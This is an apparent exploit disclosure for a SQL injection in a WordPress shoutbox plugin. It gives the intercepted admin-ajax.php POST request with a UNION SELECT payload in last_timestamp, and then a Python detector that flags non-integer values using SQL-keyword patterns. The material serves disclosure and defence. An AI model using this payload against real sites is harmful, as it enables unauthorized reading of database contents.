## https://sploitus.com/exploit?id=WPEX-ID:4E5AA9A3-65A0-47D6-BC26-A2FB6CB073FF
Submit a message in the chatbox and intercept the request, for example with Burp Suite.

Edit the request body to match the following: action=shoutbox-ajax-update-messages&last_timestamp=0)+UNION+ALL+SELECT+NULL,NULL,(SELECT+CONCAT(0x776562657870)),NULL,NULL,NULL,NULL,NULL--+&rooms%5B%5D=default

Send the request. It succeeds, and the response also lists previous messages.

```
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Origin: http://localhost
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: Shoutbox_alias=Guest_209
Connection: close

action=shoutbox-ajax-update-messages&last_timestamp=0)+UNION+ALL+SELECT+NULL,NULL,(SELECT+CONCAT(0x776562657870)),NULL,NULL,NULL,NULL,NULL--+&rooms%5B%5D=default
```
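
A defender-side check for the request above, added here as an example and not part of the original write-up or the plugin's code: it parses an `admin-ajax.php` POST body and flags any `shoutbox-ajax-update-messages` call whose `last_timestamp` is not a plain integer. The integer-only rule and the names `inspect_body`, `NUMERIC` and `SQL_HINTS` are assumptions of this example.

```python
import re
from urllib.parse import parse_qs

# Action and parameter names are taken from the request shown on this page.
ACTION = "shoutbox-ajax-update-messages"
PARAM = "last_timestamp"
# Assumption: a legitimate client only ever sends a non-negative integer here.
NUMERIC = re.compile(r"[0-9]{1,20}")
# Used only to annotate a finding; the integer check above is the actual gate.
SQL_HINTS = re.compile(r"\b(union|select|concat|sleep|benchmark)\b|--|/\*|[()';]", re.I)

# Body copied from the page, and a benign body constructed for comparison.
PAGE_BODY = ("action=shoutbox-ajax-update-messages&last_timestamp=0)+UNION+ALL+SELECT+"
             "NULL,NULL,(SELECT+CONCAT(0x776562657870)),NULL,NULL,NULL,NULL,NULL--+"
             "&rooms%5B%5D=default")
BENIGN_BODY = "action=shoutbox-ajax-update-messages&last_timestamp=1700000000&rooms%5B%5D=default"


def inspect_body(body):
    """Return a list of findings for one urlencoded admin-ajax.php POST body."""
    fields = parse_qs(body, keep_blank_values=True)  # decodes '+' and %XX
    if ACTION not in fields.get("action", []):
        return []  # some other AJAX action; out of scope for this rule
    values = fields.get(PARAM, [])
    findings = []
    if len(values) != 1:
        # Missing or repeated parameters can hide a payload from naive filters.
        findings.append(f"{PARAM} present {len(values)} times (expected 1)")
    for value in values:
        if NUMERIC.fullmatch(value):
            continue
        hints = sorted({m.group(0).lower() for m in SQL_HINTS.finditer(value)})
        detail = f"; SQL tokens: {', '.join(hints)}" if hints else ""
        findings.append(f"{PARAM} is not an integer: {value!r}{detail}")
    return findings


if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("page", PAGE_BODY)):
        print(label, inspect_body(body) or "ok")
```

The same integer-only rule is what the server side should enforce before the value reaches a query; the detector only reports requests that violate it.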